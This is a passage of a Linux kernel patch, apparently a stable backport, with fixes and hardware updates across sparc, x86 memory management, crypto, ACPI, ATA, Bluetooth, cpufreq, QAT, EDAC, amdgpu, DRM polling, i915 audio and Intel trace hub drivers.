+-	unsigned short c_oflag;		/* output mode flags */
+-	unsigned short c_cflag;		/* control mode flags */
+-	unsigned short c_lflag;		/* local mode flags */
+-	unsigned char c_line;		/* line discipline */
+-	unsigned char c_cc[NCC];	/* control characters */
+-};
+-
+ #define NCCS 17
+ struct termios {
+ 	tcflag_t c_iflag;		/* input mode flags */
+diff --git a/arch/sparc/include/uapi/asm/termios.h b/arch/sparc/include/uapi/asm/termios.h
+index ee86f4093d83e..cceb32260881e 100644
+--- a/arch/sparc/include/uapi/asm/termios.h
++++ b/arch/sparc/include/uapi/asm/termios.h
+@@ -40,5 +40,14 @@ struct winsize {
+ 	unsigned short ws_ypixel;
+ };
+ 
++#define NCC 8
++struct termio {
++	unsigned short c_iflag;		/* input mode flags */
++	unsigned short c_oflag;		/* output mode flags */
++	unsigned short c_cflag;		/* control mode flags */
++	unsigned short c_lflag;		/* local mode flags */
++	unsigned char c_line;		/* line discipline */
++	unsigned char c_cc[NCC];	/* control characters */
++};
+ 
+ #endif /* _UAPI_SPARC_TERMIOS_H */
+diff --git a/arch/sparc/kernel/prom_64.c b/arch/sparc/kernel/prom_64.c
+index f883a50fa3339..4eae633f71982 100644
+--- a/arch/sparc/kernel/prom_64.c
++++ b/arch/sparc/kernel/prom_64.c
+@@ -483,7 +483,9 @@ static void *record_one_cpu(struct device_node *dp, int cpuid, int arg)
+ 	ncpus_probed++;
+ #ifdef CONFIG_SMP
+ 	set_cpu_present(cpuid, true);
+-	set_cpu_possible(cpuid, true);
++
++	if (num_possible_cpus() < nr_cpu_ids)
++		set_cpu_possible(cpuid, true);
+ #endif
+ 	return NULL;
+ }
+diff --git a/arch/sparc/kernel/setup_64.c b/arch/sparc/kernel/setup_64.c
+index 48abee4eee29d..9e6e7f983d142 100644
+--- a/arch/sparc/kernel/setup_64.c
++++ b/arch/sparc/kernel/setup_64.c
+@@ -684,7 +684,6 @@ void __init setup_arch(char **cmdline_p)
+ 
+ 	paging_init();
+ 	init_sparc64_elf_hwcap();
+-	smp_fill_in_cpu_possible_map();
+ 	/*
+ 	 * Once the OF device tree and MDESC have been setup and nr_cpus has
+ 	 * been parsed, we know the list of possible cpus.  Therefore we can
+diff --git a/arch/sparc/kernel/smp_64.c b/arch/sparc/kernel/smp_64.c
+index a55295d1b9244..35e8a1e84da60 100644
+--- a/arch/sparc/kernel/smp_64.c
++++ b/arch/sparc/kernel/smp_64.c
+@@ -1204,20 +1204,6 @@ void __init smp_setup_processor_id(void)
+ 		xcall_deliver_impl = hypervisor_xcall_deliver;
+ }
+ 
+-void __init smp_fill_in_cpu_possible_map(void)
+-{
+-	int possible_cpus = num_possible_cpus();
+-	int i;
+-
+-	if (possible_cpus > nr_cpu_ids)
+-		possible_cpus = nr_cpu_ids;
+-
+-	for (i = 0; i < possible_cpus; i++)
+-		set_cpu_possible(i, true);
+-	for (; i < NR_CPUS; i++)
+-		set_cpu_possible(i, false);
+-}
+-
+ void smp_fill_in_sib_core_maps(void)
+ {
+ 	unsigned int i;
+diff --git a/arch/sparc/mm/tlb.c b/arch/sparc/mm/tlb.c
+index 9a725547578e8..946f33c1b032f 100644
+--- a/arch/sparc/mm/tlb.c
++++ b/arch/sparc/mm/tlb.c
+@@ -245,6 +245,7 @@ pmd_t pmdp_invalidate(struct vm_area_struct *vma, unsigned long address,
+ {
+ 	pmd_t old, entry;
+ 
++	VM_WARN_ON_ONCE(!pmd_present(*pmdp));
+ 	entry = __pmd(pmd_val(*pmdp) & ~_PAGE_VALID);
+ 	old = pmdp_establish(vma, address, pmdp, entry);
+ 	flush_tlb_range(vma, address, address + HPAGE_PMD_SIZE);
+diff --git a/arch/x86/mm/pgtable.c b/arch/x86/mm/pgtable.c
+index 8525f2876fb40..77ee0012f8497 100644
+--- a/arch/x86/mm/pgtable.c
++++ b/arch/x86/mm/pgtable.c
+@@ -615,6 +615,8 @@ int pmdp_clear_flush_young(struct vm_area_struct *vma,
+ pmd_t pmdp_invalidate_ad(struct vm_area_struct *vma, unsigned long address,
+ 			 pmd_t *pmdp)
+ {
++	VM_WARN_ON_ONCE(!pmd_present(*pmdp));
++
+ 	/*
+ 	 * No flush is necessary. Once an invalid PTE is established, the PTE's
+ 	 * access and dirty bits cannot be updated.
+diff --git a/crypto/ecdsa.c b/crypto/ecdsa.c
+index fbd76498aba83..3f9ec273a121f 100644
+--- a/crypto/ecdsa.c
++++ b/crypto/ecdsa.c
+@@ -373,4 +373,7 @@ module_exit(ecdsa_exit);
+ MODULE_LICENSE("GPL");
+ MODULE_AUTHOR("Stefan Berger <stefanb@linux.ibm.com>");
+ MODULE_DESCRIPTION("ECDSA generic algorithm");
++MODULE_ALIAS_CRYPTO("ecdsa-nist-p192");
++MODULE_ALIAS_CRYPTO("ecdsa-nist-p256");
++MODULE_ALIAS_CRYPTO("ecdsa-nist-p384");
+ MODULE_ALIAS_CRYPTO("ecdsa-generic");
+diff --git a/crypto/ecrdsa.c b/crypto/ecrdsa.c
+index f3c6b5e15e75b..3811f3805b5d8 100644
+--- a/crypto/ecrdsa.c
++++ b/crypto/ecrdsa.c
+@@ -294,4 +294,5 @@ module_exit(ecrdsa_mod_fini);
+ MODULE_LICENSE("GPL");
+ MODULE_AUTHOR("Vitaly Chikunov <vt@altlinux.org>");
+ MODULE_DESCRIPTION("EC-RDSA generic algorithm");
++MODULE_ALIAS_CRYPTO("ecrdsa");
+ MODULE_ALIAS_CRYPTO("ecrdsa-generic");
+diff --git a/drivers/acpi/resource.c b/drivers/acpi/resource.c
+index 1c5c1a269fbee..d34812db1b67a 100644
+--- a/drivers/acpi/resource.c
++++ b/drivers/acpi/resource.c
+@@ -576,6 +576,18 @@ static const struct dmi_system_id lg_laptop[] = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "X577"),
+ 		},
+ 	},
++	{
++		/* TongFang GXxHRXx/TUXEDO InfinityBook Pro Gen9 AMD */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "GXxHRXx"),
++		},
++	},
++	{
++		/* TongFang GMxHGxx/TUXEDO Stellaris Slim Gen1 AMD */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "GMxHGxx"),
++		},
++	},
+ 	{ }
+ };
+ 
+diff --git a/drivers/ata/pata_legacy.c b/drivers/ata/pata_legacy.c
+index 03c580625c2cc..55b462ce99df0 100644
+--- a/drivers/ata/pata_legacy.c
++++ b/drivers/ata/pata_legacy.c
+@@ -173,8 +173,6 @@ static int legacy_port[NR_HOST] = { 0x1f0, 0x170, 0x1e8, 0x168, 0x1e0, 0x160 };
+ static struct legacy_probe probe_list[NR_HOST];
+ static struct legacy_data legacy_data[NR_HOST];
+ static struct ata_host *legacy_host[NR_HOST];
+-static int nr_legacy_host;
+-
+ 
+ /**
+  *	legacy_probe_add	-	Add interface to probe list
+@@ -1276,9 +1274,11 @@ static __exit void legacy_exit(void)
+ {
+ 	int i;
+ 
+-	for (i = 0; i < nr_legacy_host; i++) {
++	for (i = 0; i < NR_HOST; i++) {
+ 		struct legacy_data *ld = &legacy_data[i];
+-		ata_host_detach(legacy_host[i]);
++
++		if (legacy_host[i])
++			ata_host_detach(legacy_host[i]);
+ 		platform_device_unregister(ld->platform_dev);
+ 	}
+ }
+diff --git a/drivers/bluetooth/btrtl.c b/drivers/bluetooth/btrtl.c
+index ead632595ce06..5671f0d9ab28c 100644
+--- a/drivers/bluetooth/btrtl.c
++++ b/drivers/bluetooth/btrtl.c
+@@ -1074,19 +1074,33 @@ MODULE_FIRMWARE("rtl_bt/rtl8723cs_vf_fw.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8723cs_vf_config.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8723cs_xx_fw.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8723cs_xx_config.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8723d_fw.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8723d_config.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8723ds_fw.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8723ds_config.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8761a_fw.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8761a_config.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8761b_fw.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8761b_config.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8761bu_fw.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8761bu_config.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8821a_fw.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8821a_config.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8821c_fw.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8821c_config.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8821cs_fw.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8821cs_config.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8822b_fw.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8822b_config.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8822cs_fw.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8822cs_config.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8822cu_fw.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8822cu_config.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8851bu_fw.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8851bu_config.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8852au_fw.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8852au_config.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8852bu_fw.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8852bu_config.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8852cu_fw.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8852cu_config.bin");
+-MODULE_FIRMWARE("rtl_bt/rtl8851bu_fw.bin");
+-MODULE_FIRMWARE("rtl_bt/rtl8851bu_config.bin");
+diff --git a/drivers/cpufreq/amd-pstate.c b/drivers/cpufreq/amd-pstate.c
+index 90dcf26f09731..9f147e9eafb63 100644
+--- a/drivers/cpufreq/amd-pstate.c
++++ b/drivers/cpufreq/amd-pstate.c
+@@ -424,7 +424,7 @@ static int amd_pstate_set_boost(struct cpufreq_policy *policy, int state)
+ 	if (state)
+ 		policy->cpuinfo.max_freq = cpudata->max_freq;
+ 	else
+-		policy->cpuinfo.max_freq = cpudata->nominal_freq;
++		policy->cpuinfo.max_freq = cpudata->nominal_freq * 1000;
+ 
+ 	policy->max = policy->cpuinfo.max_freq;
+ 
+diff --git a/drivers/crypto/qat/qat_common/adf_aer.c b/drivers/crypto/qat/qat_common/adf_aer.c
+index 4f36b5a9164a7..d4bf6cd927a2a 100644
+--- a/drivers/crypto/qat/qat_common/adf_aer.c
++++ b/drivers/crypto/qat/qat_common/adf_aer.c
+@@ -95,8 +95,7 @@ static void adf_device_reset_worker(struct work_struct *work)
+ 	if (adf_dev_init(accel_dev) || adf_dev_start(accel_dev)) {
+ 		/* The device hanged and we can't restart it so stop here */
+ 		dev_err(&GET_DEV(accel_dev), "Restart device failed\n");
+-		if (reset_data->mode == ADF_DEV_RESET_ASYNC ||
+-		    completion_done(&reset_data->compl))
++		if (reset_data->mode == ADF_DEV_RESET_ASYNC)
+ 			kfree(reset_data);
+ 		WARN(1, "QAT: device restart failed. Device is unusable\n");
+ 		return;
+@@ -104,16 +103,8 @@ static void adf_device_reset_worker(struct work_struct *work)
+ 	adf_dev_restarted_notify(accel_dev);
+ 	clear_bit(ADF_STATUS_RESTARTING, &accel_dev->status);
+ 
+-	/*
+-	 * The dev is back alive. Notify the caller if in sync mode
+-	 *
+-	 * If device restart will take a more time than expected,
+-	 * the schedule_reset() function can timeout and exit. This can be
+-	 * detected by calling the completion_done() function. In this case
+-	 * the reset_data structure needs to be freed here.
+-	 */
+-	if (reset_data->mode == ADF_DEV_RESET_ASYNC ||
+-	    completion_done(&reset_data->compl))
++	/* The dev is back alive. Notify the caller if in sync mode */
++	if (reset_data->mode == ADF_DEV_RESET_ASYNC)
+ 		kfree(reset_data);
+ 	else
+ 		complete(&reset_data->compl);
+@@ -148,10 +139,10 @@ static int adf_dev_aer_schedule_reset(struct adf_accel_dev *accel_dev,
+ 		if (!timeout) {
+ 			dev_err(&GET_DEV(accel_dev),
+ 				"Reset device timeout expired\n");
++			cancel_work_sync(&reset_data->reset_work);
+ 			ret = -EFAULT;
+-		} else {
+-			kfree(reset_data);
+ 		}
++		kfree(reset_data);
+ 		return ret;
+ 	}
+ 	return 0;
+diff --git a/drivers/edac/igen6_edac.c b/drivers/edac/igen6_edac.c
+index 8ec70da8d84fe..c46880a934da0 100644
+--- a/drivers/edac/igen6_edac.c
++++ b/drivers/edac/igen6_edac.c
+@@ -627,7 +627,7 @@ static int errcmd_enable_error_reporting(bool enable)
+ 
+ 	rc = pci_read_config_word(imc->pdev, ERRCMD_OFFSET, &errcmd);
+ 	if (rc)
+-		return rc;
++		return pcibios_err_to_errno(rc);
+ 
+ 	if (enable)
+ 		errcmd |= ERRCMD_CE | ERRSTS_UE;
+@@ -636,7 +636,7 @@ static int errcmd_enable_error_reporting(bool enable)
+ 
+ 	rc = pci_write_config_word(imc->pdev, ERRCMD_OFFSET, errcmd);
+ 	if (rc)
+-		return rc;
++		return pcibios_err_to_errno(rc);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_atomfirmware.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_atomfirmware.c
+index 9b97fa39d47a2..0d017dc94f013 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_atomfirmware.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_atomfirmware.c
+@@ -207,6 +207,7 @@ union igp_info {
+ 	struct atom_integrated_system_info_v1_11 v11;
+ 	struct atom_integrated_system_info_v1_12 v12;
+ 	struct atom_integrated_system_info_v2_1 v21;
++	struct atom_integrated_system_info_v2_3 v23;
+ };
+ 
+ union umc_info {
+@@ -347,6 +348,20 @@ amdgpu_atomfirmware_get_vram_info(struct amdgpu_device *adev,
+ 					if (vram_type)
+ 						*vram_type = convert_atom_mem_type_to_vram_type(adev, mem_type);
+ 					break;
++				case 3:
++					mem_channel_number = igp_info->v23.umachannelnumber;
++					if (!mem_channel_number)
++						mem_channel_number = 1;
++					mem_type = igp_info->v23.memorytype;
++					if (mem_type == LpDdr5MemType)
++						mem_channel_width = 32;
++					else
++						mem_channel_width = 64;
++					if (vram_width)
++						*vram_width = mem_channel_number * mem_channel_width;
++					if (vram_type)
++						*vram_type = convert_atom_mem_type_to_vram_type(adev, mem_type);
++					break;
+ 				default:
+ 					return -EINVAL;
+ 				}
+diff --git a/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c b/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
+index 97b033dfe9e45..68cdb6682776a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
+@@ -2049,6 +2049,9 @@ static int sdma_v4_0_process_trap_irq(struct amdgpu_device *adev,
+ 
+ 	DRM_DEBUG("IH: SDMA trap\n");
+ 	instance = sdma_v4_0_irq_id_to_seq(entry->client_id);
++	if (instance < 0)
++		return instance;
++
+ 	switch (entry->ring_id) {
+ 	case 0:
+ 		amdgpu_fence_process(&adev->sdma.instance[instance].ring);
+diff --git a/drivers/gpu/drm/amd/include/atomfirmware.h b/drivers/gpu/drm/amd/include/atomfirmware.h
+index bbe1337a8cee3..e2207f1c5bad3 100644
+--- a/drivers/gpu/drm/amd/include/atomfirmware.h
++++ b/drivers/gpu/drm/amd/include/atomfirmware.h
+@@ -1624,6 +1624,49 @@ struct atom_integrated_system_info_v2_2
+ 	uint32_t  reserved4[189];
+ };
+ 
++struct uma_carveout_option {
++  char       optionName[29];        //max length of string is 28chars + '\0'. Current design is for "minimum", "Medium", "High". This makes entire struct size 64bits
++  uint8_t    memoryCarvedGb;        //memory carved out with setting
++  uint8_t    memoryRemainingGb;     //memory remaining on system
++  union {
++    struct _flags {
++      uint8_t Auto     : 1;
++      uint8_t Custom   : 1;
++      uint8_t Reserved : 6;
++    } flags;
++    uint8_t all8;
++  } uma_carveout_option_flags;
++};
++
++struct atom_integrated_system_info_v2_3 {
++  struct  atom_common_table_header table_header;
++  uint32_t  vbios_misc; // enum of atom_system_vbiosmisc_def
++  uint32_t  gpucapinfo; // enum of atom_system_gpucapinf_def
++  uint32_t  system_config;
++  uint32_t  cpucapinfo;
++  uint16_t  gpuclk_ss_percentage; // unit of 0.001%,   1000 mean 1%
++  uint16_t  gpuclk_ss_type;
++  uint16_t  dpphy_override;  // bit vector, enum of atom_sysinfo_dpphy_override_def
++  uint8_t memorytype;       // enum of atom_dmi_t17_mem_type_def, APU memory type indication.
++  uint8_t umachannelnumber; // number of memory channels
++  uint8_t htc_hyst_limit;
++  uint8_t htc_tmp_limit;
++  uint8_t reserved1; // dp_ss_control
++  uint8_t gpu_package_id;
++  struct  edp_info_table  edp1_info;
++  struct  edp_info_table  edp2_info;
++  uint32_t  reserved2[8];
++  struct  atom_external_display_connection_info extdispconninfo;
++  uint8_t UMACarveoutVersion;
++  uint8_t UMACarveoutIndexMax;
++  uint8_t UMACarveoutTypeDefault;
++  uint8_t UMACarveoutIndexDefault;
++  uint8_t UMACarveoutType;           //Auto or Custom
++  uint8_t UMACarveoutIndex;
++  struct  uma_carveout_option UMASizeControlOption[20];
++  uint8_t reserved3[110];
++};
++
+ // system_config
+ enum atom_system_vbiosmisc_def{
+   INTEGRATED_SYSTEM_INFO__GET_EDID_CALLBACK_FUNC_SUPPORT = 0x01,
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c
+index 5de31961319a2..b464a1f7e393c 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c
+@@ -222,15 +222,17 @@ static int smu_v13_0_4_system_features_control(struct smu_context *smu, bool en)
+ 	struct amdgpu_device *adev = smu->adev;
+ 	int ret = 0;
+ 
+-	if (!en && adev->in_s4) {
+-		/* Adds a GFX reset as workaround just before sending the
+-		 * MP1_UNLOAD message to prevent GC/RLC/PMFW from entering
+-		 * an invalid state.
+-		 */
+-		ret = smu_cmn_send_smc_msg_with_param(smu, SMU_MSG_GfxDeviceDriverReset,
+-						      SMU_RESET_MODE_2, NULL);
+-		if (ret)
+-			return ret;
++	if (!en && !adev->in_s0ix) {
++		if (adev->in_s4) {
++			/* Adds a GFX reset as workaround just before sending the
++			 * MP1_UNLOAD message to prevent GC/RLC/PMFW from entering
++			 * an invalid state.
++			 */
++			ret = smu_cmn_send_smc_msg_with_param(smu, SMU_MSG_GfxDeviceDriverReset,
++							      SMU_RESET_MODE_2, NULL);
++			if (ret)
++				return ret;
++		}
+ 
+ 		ret = smu_cmn_send_smc_msg(smu, SMU_MSG_PrepareMp1ForUnload, NULL);
+ 	}
+diff --git a/drivers/gpu/drm/drm_modeset_helper.c b/drivers/gpu/drm/drm_modeset_helper.c
+index f858dfedf2cfc..2c582020cb423 100644
+--- a/drivers/gpu/drm/drm_modeset_helper.c
++++ b/drivers/gpu/drm/drm_modeset_helper.c
+@@ -193,13 +193,22 @@ int drm_mode_config_helper_suspend(struct drm_device *dev)
+ 
+ 	if (!dev)
+ 		return 0;
++	/*
++	 * Don't disable polling if it was never initialized
++	 */
++	if (dev->mode_config.poll_enabled)
++		drm_kms_helper_poll_disable(dev);
+ 
+-	drm_kms_helper_poll_disable(dev);
+ 	drm_fb_helper_set_suspend_unlocked(dev->fb_helper, 1);
+ 	state = drm_atomic_helper_suspend(dev);
+ 	if (IS_ERR(state)) {
+ 		drm_fb_helper_set_suspend_unlocked(dev->fb_helper, 0);
+-		drm_kms_helper_poll_enable(dev);
++		/*
++		 * Don't enable polling if it was never initialized
++		 */
++		if (dev->mode_config.poll_enabled)
++			drm_kms_helper_poll_enable(dev);
++
+ 		return PTR_ERR(state);
+ 	}
+ 
+@@ -239,7 +248,11 @@ int drm_mode_config_helper_resume(struct drm_device *dev)
+ 	dev->mode_config.suspend_state = NULL;
+ 
+ 	drm_fb_helper_set_suspend_unlocked(dev->fb_helper, 0);
+-	drm_kms_helper_poll_enable(dev);
++	/*
++	 * Don't enable polling if it is not initialized
++	 */
++	if (dev->mode_config.poll_enabled)
++		drm_kms_helper_poll_enable(dev);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/gpu/drm/drm_probe_helper.c b/drivers/gpu/drm/drm_probe_helper.c
+index 52dbaf74fe164..0e5eadc6d44de 100644
+--- a/drivers/gpu/drm/drm_probe_helper.c
++++ b/drivers/gpu/drm/drm_probe_helper.c
+@@ -235,6 +235,9 @@ drm_connector_mode_valid(struct drm_connector *connector,
+  * Drivers can call this helper from their device resume implementation. It is
+  * not an error to call this even when output polling isn't enabled.
+  *
++ * If device polling was never initialized before, this call will trigger a
++ * warning and return.
++ *
+  * Note that calls to enable and disable polling must be strictly ordered, which
+  * is automatically the case when they're only call from suspend/resume
+  * callbacks.
+@@ -246,7 +249,8 @@ void drm_kms_helper_poll_enable(struct drm_device *dev)
+ 	struct drm_connector_list_iter conn_iter;
+ 	unsigned long delay = DRM_OUTPUT_POLL_PERIOD;
+ 
+-	if (!dev->mode_config.poll_enabled || !drm_kms_helper_poll)
++	if (drm_WARN_ON_ONCE(dev, !dev->mode_config.poll_enabled) ||
++	    !drm_kms_helper_poll || dev->mode_config.poll_running)
+ 		return;
+ 
+ 	drm_connector_list_iter_begin(dev, &conn_iter);
+@@ -570,7 +574,8 @@ int drm_helper_probe_single_connector_modes(struct drm_connector *connector,
+ 	}
+ 
+ 	/* Re-enable polling in case the global poll config changed. */
+-	if (drm_kms_helper_poll != dev->mode_config.poll_running)
++	if (dev->mode_config.poll_enabled &&
++	    (drm_kms_helper_poll != dev->mode_config.poll_running))
+ 		drm_kms_helper_poll_enable(dev);
+ 
+ 	dev->mode_config.poll_running = drm_kms_helper_poll;
+@@ -821,14 +826,18 @@ EXPORT_SYMBOL(drm_kms_helper_is_poll_worker);
+  * not an error to call this even when output polling isn't enabled or already
+  * disabled. Polling is re-enabled by calling drm_kms_helper_poll_enable().
+  *
++ * If however, the polling was never initialized, this call will trigger a
++ * warning and return
++ *
+  * Note that calls to enable and disable polling must be strictly ordered, which
+  * is automatically the case when they're only call from suspend/resume
+  * callbacks.
+  */
+ void drm_kms_helper_poll_disable(struct drm_device *dev)
+ {
+-	if (!dev->mode_config.poll_enabled)
++	if (drm_WARN_ON(dev, !dev->mode_config.poll_enabled))
+ 		return;
++
+ 	cancel_delayed_work_sync(&dev->mode_config.output_poll_work);
+ }
+ EXPORT_SYMBOL(drm_kms_helper_poll_disable);
+diff --git a/drivers/gpu/drm/i915/display/intel_audio.c b/drivers/gpu/drm/i915/display/intel_audio.c
+index aacbc6da84efa..a5fa0682110a2 100644
+--- a/drivers/gpu/drm/i915/display/intel_audio.c
++++ b/drivers/gpu/drm/i915/display/intel_audio.c
+@@ -73,19 +73,6 @@ struct intel_audio_funcs {
+ 				    const struct drm_connector_state *old_conn_state);
+ };
+ 
+-/* DP N/M table */
+-#define LC_810M	810000
+-#define LC_540M	540000
+-#define LC_270M	270000
+-#define LC_162M	162000
+-
+-struct dp_aud_n_m {
+-	int sample_rate;
+-	int clock;
+-	u16 m;
+-	u16 n;
+-};
+-
+ struct hdmi_aud_ncts {
+ 	int sample_rate;
+ 	int clock;
+@@ -93,60 +80,6 @@ struct hdmi_aud_ncts {
+ 	int cts;
+ };
+ 
+-/* Values according to DP 1.4 Table 2-104 */
+-static const struct dp_aud_n_m dp_aud_n_m[] = {
+-	{ 32000, LC_162M, 1024, 10125 },
+-	{ 44100, LC_162M, 784, 5625 },
+-	{ 48000, LC_162M, 512, 3375 },
+-	{ 64000, LC_162M, 2048, 10125 },
+-	{ 88200, LC_162M, 1568, 5625 },
+-	{ 96000, LC_162M, 1024, 3375 },
+-	{ 128000, LC_162M, 4096, 10125 },
+-	{ 176400, LC_162M, 3136, 5625 },
+-	{ 192000, LC_162M, 2048, 3375 },
+-	{ 32000, LC_270M, 1024, 16875 },
+-	{ 44100, LC_270M, 784, 9375 },
+-	{ 48000, LC_270M, 512, 5625 },
+-	{ 64000, LC_270M, 2048, 16875 },
+-	{ 88200, LC_270M, 1568, 9375 },
+-	{ 96000, LC_270M, 1024, 5625 },
+-	{ 128000, LC_270M, 4096, 16875 },
+-	{ 176400, LC_270M, 3136, 9375 },
+-	{ 192000, LC_270M, 2048, 5625 },
+-	{ 32000, LC_540M, 1024, 33750 },
+-	{ 44100, LC_540M, 784, 18750 },
+-	{ 48000, LC_540M, 512, 11250 },
+-	{ 64000, LC_540M, 2048, 33750 },
+-	{ 88200, LC_540M, 1568, 18750 },
+-	{ 96000, LC_540M, 1024, 11250 },
+-	{ 128000, LC_540M, 4096, 33750 },
+-	{ 176400, LC_540M, 3136, 18750 },
+-	{ 192000, LC_540M, 2048, 11250 },
+-	{ 32000, LC_810M, 1024, 50625 },
+-	{ 44100, LC_810M, 784, 28125 },
+-	{ 48000, LC_810M, 512, 16875 },
+-	{ 64000, LC_810M, 2048, 50625 },
+-	{ 88200, LC_810M, 1568, 28125 },
+-	{ 96000, LC_810M, 1024, 16875 },
+-	{ 128000, LC_810M, 4096, 50625 },
+-	{ 176400, LC_810M, 3136, 28125 },
+-	{ 192000, LC_810M, 2048, 16875 },
+-};
+-
+-static const struct dp_aud_n_m *
+-audio_config_dp_get_n_m(const struct intel_crtc_state *crtc_state, int rate)
+-{
+-	int i;
+-
+-	for (i = 0; i < ARRAY_SIZE(dp_aud_n_m); i++) {
+-		if (rate == dp_aud_n_m[i].sample_rate &&
+-		    crtc_state->port_clock == dp_aud_n_m[i].clock)
+-			return &dp_aud_n_m[i];
+-	}
+-
+-	return NULL;
+-}
+-
+ static const struct {
+ 	int clock;
+ 	u32 config;
+@@ -392,48 +325,17 @@ static void
+ hsw_dp_audio_config_update(struct intel_encoder *encoder,
+ 			   const struct intel_crtc_state *crtc_state)
+ {
+-	struct drm_i915_private *dev_priv = to_i915(encoder->base.dev);
+-	struct i915_audio_component *acomp = dev_priv->display.audio.component;
++	struct drm_i915_private *i915 = to_i915(encoder->base.dev);
+ 	enum transcoder cpu_transcoder = crtc_state->cpu_transcoder;
+-	enum port port = encoder->port;
+-	const struct dp_aud_n_m *nm;
+-	int rate;
+-	u32 tmp;
+ 
+-	rate = acomp ? acomp->aud_sample_rate[port] : 0;
+-	nm = audio_config_dp_get_n_m(crtc_state, rate);
+-	if (nm)
+-		drm_dbg_kms(&dev_priv->drm, "using Maud %u, Naud %u\n", nm->m,
+-			    nm->n);
+-	else
+-		drm_dbg_kms(&dev_priv->drm, "using automatic Maud, Naud\n");
+-
+-	tmp = intel_de_read(dev_priv, HSW_AUD_CFG(cpu_transcoder));
+-	tmp &= ~AUD_CONFIG_N_VALUE_INDEX;
+-	tmp &= ~AUD_CONFIG_PIXEL_CLOCK_HDMI_MASK;
+-	tmp &= ~AUD_CONFIG_N_PROG_ENABLE;
+-	tmp |= AUD_CONFIG_N_VALUE_INDEX;
+-
+-	if (nm) {
+-		tmp &= ~AUD_CONFIG_N_MASK;
+-		tmp |= AUD_CONFIG_N(nm->n);
+-		tmp |= AUD_CONFIG_N_PROG_ENABLE;
+-	}
+-
+-	intel_de_write(dev_priv, HSW_AUD_CFG(cpu_transcoder), tmp);
+-
+-	tmp = intel_de_read(dev_priv, HSW_AUD_M_CTS_ENABLE(cpu_transcoder));
+-	tmp &= ~AUD_CONFIG_M_MASK;
+-	tmp &= ~AUD_M_CTS_M_VALUE_INDEX;
+-	tmp &= ~AUD_M_CTS_M_PROG_ENABLE;
+-
+-	if (nm) {
+-		tmp |= nm->m;
+-		tmp |= AUD_M_CTS_M_VALUE_INDEX;
+-		tmp |= AUD_M_CTS_M_PROG_ENABLE;
+-	}
+-
+-	intel_de_write(dev_priv, HSW_AUD_M_CTS_ENABLE(cpu_transcoder), tmp);
++	/* Enable time stamps. Let HW calculate Maud/Naud values */
++	intel_de_rmw(i915, HSW_AUD_CFG(cpu_transcoder),
++		     AUD_CONFIG_N_VALUE_INDEX |
++		     AUD_CONFIG_PIXEL_CLOCK_HDMI_MASK |
++		     AUD_CONFIG_UPPER_N_MASK |
++		     AUD_CONFIG_LOWER_N_MASK |
++		     AUD_CONFIG_N_PROG_ENABLE,
++		     AUD_CONFIG_N_VALUE_INDEX);
+ }
+ 
+ static void
+diff --git a/drivers/hwtracing/intel_th/pci.c b/drivers/hwtracing/intel_th/pci.c
+index 147d338c191e7..648893f9e4b67 100644
+--- a/drivers/hwtracing/intel_th/pci.c
++++ b/drivers/hwtracing/intel_th/pci.c
+@@ -289,6 +289,11 @@ static const struct pci_device_id intel_th_pci_id_table[] = {
+ 		PCI_DEVICE(PCI_VENDOR_ID_INTEL, 0x7e24),
+ 		.driver_data = (kernel_ulong_t)&intel_th_2x,
+ 	},
++	{
++		/* Meteor Lake-S CPU */
++		PCI_DEVICE(PCI_VENDOR_ID_INTEL, 0xae24),
++		.driver_data = (kernel_ulong_t)&intel_th_2x,
++	},
+ 	{
+ 		/* Raptor Lake-S */
+ 		PCI_DEVICE(PCI_VENDOR_ID_INTEL, 0x7a26),
